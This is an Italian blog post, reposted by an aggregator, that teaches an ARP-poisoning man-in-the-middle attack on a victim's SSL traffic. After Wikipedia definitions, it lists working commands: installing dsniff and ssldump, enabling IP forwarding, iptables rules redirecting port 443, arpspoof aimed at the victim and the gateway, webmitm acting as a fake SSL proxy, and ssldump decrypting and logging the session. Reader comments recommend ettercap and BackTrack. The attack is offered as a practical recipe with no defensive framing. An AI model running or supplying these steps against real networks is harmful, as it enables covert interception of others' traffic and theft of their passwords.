NOTA BENE: Il Bloggatore ha rilevato dei problemi di collegamento con il blog indicato come fonte originale dell'articolo. Pertanto, al fine di consentire agli utenti di leggere questo articolo, se possibile, viene reso temporaneamente disponibile il post completo.
In tanto, iniziamo con un po’ di teoria:
Arp Poisoning by Wikipedia:
In ambito informatico, l’ARP poisoning (detto anche ARP spoofing) è una tecnica di hacking che consente ad un attacker, in una switched lan, di concretizzare un attacco di tipo man in the middle verso tutte le macchine che si trovano nello stesso segmento di rete. L’ARP poisoning è oggi la principale tecnica di attacco alle lan commutate. Consiste nell’inviare intenzionalmente e in modo forzato risposte ARP contenenti dati inesatti o, meglio, non corrispondenti a quelli reali. In questo modo la tabella ARP (ARP entry cache) di un host conterrà dati alterati (da qui i termini poisoning, letteralmente avvelenamento e spoofing, raggiro). Molto spesso lo scopo di questo tipo di attacco è quello di redirigere, in una rete commutata, i pacchetti destinati ad un host verso un altro al fine di leggere il contenuto di questi per catturare le password che in alcuni protocolli viaggiano in chiaro.
SSL by Wikipedia:
Transport Layer Security (TLS) e il suo predecessore Secure Sockets Layer (SSL) sono dei protocolli crittografici che permettono una comunicazione sicura e una integrità dei dati su reti TCP/IP come, ad esempio, internet. TLS e SSL operano a Livello di trasporto (Transport Layer) e criptano la comunicazione dalla sorgente alla destinazione (end-to-end).
Diverse versioni del protocollo sono ampiamente utilizzate in applicazioni come i browser, l’E-mail, la messaggistica istantanea e il Voice over IP.
TLS è un protocollo standard IETF che, nella sua ultima versione, è definito nella RFC 5246, sviluppata sulla base del precedente protocollo SSL da Netscape Corporation.
Ok, adesso possiamo iniziare 
Per prima cosa bisogna che mappiamo la nostra rete , per capire il bersaglio
GUIDA al Mapping della rete
Ora che abbiamo una mappa della nostra rete, posiamo iniziare .
Questo attacco lo effettueremo con Linux verso una macchina windows
Installiamo il software necessario su Linux (nel mio caso con ubuntu mi è bastato digitare:)
sudo apt-get install dsniff ssldump
Ma cosa vogliamo fare ?
Cerchiamo di deviare tutto il traffico tra la macchina vittima e il router che ci manda in internet in modo che passi per noi e possa essere così analizzabile.
La nostra postazione deve essere inoltre trasparente e inoltrare il traffico dell’attaccato verso il gateway.
Adesso abilitiamo il forwarding digitando:
sudo -s
e dopo:
echo 1 > /proc/sys/net/ipv4/ip_forward
Adesso aggiungiamo a iptables delle regole che consentano di gestire opportunamente il traffico che non è diretto a noi:
sudo iptables -t nat -A PREROUTING -p tcp --dport 443 -j REDIRECT
sudo iptables -A FORWARD -j ACCEPT
A questo punto “convinciamo” la macchina dell’attaccato ad inviare a noi il traffico che vuole far uscire su internet:
sudo arpspoof -t "ipvittima" "ip_gateway/router"
Ok adesso
webmitm in modalità “debugging”.
webmitm -d
Webmitm è un proxy “trasparente” per il traffico SSL utilizzato di norma per operazioni di monitoraggio.
Adesso eseguiamo ssldump per analizzare il contenuto del traffico che stiamo catturando (che comparirà sul monitor) e salvarlo in un file per consentirci una lettura più comoda:
ssldump -n -d -k webmitm.crt | tee ssldump_attack.log
Altri articoli interessanti:
- Articolo precedente: Typism: Editor online per creare font
- Articolo successivo: Mashimaro: il piccolissimo lettore Mp3
SEGNALA / INVIA QUESTO POST:
Hai trovato questo articolo interessante? Iscriviti GRATIS ai nostri feeds!
Secondo me migliore sniffer questo è ettercap-gtk, chè funziona benissimo sotto ubuntu.
Grazie.
PS: Oppure BT3-Final……….
backtrack forever + ettercap (qualsiasi versione)!!! Lo dice uno che ha sempre amato ettercap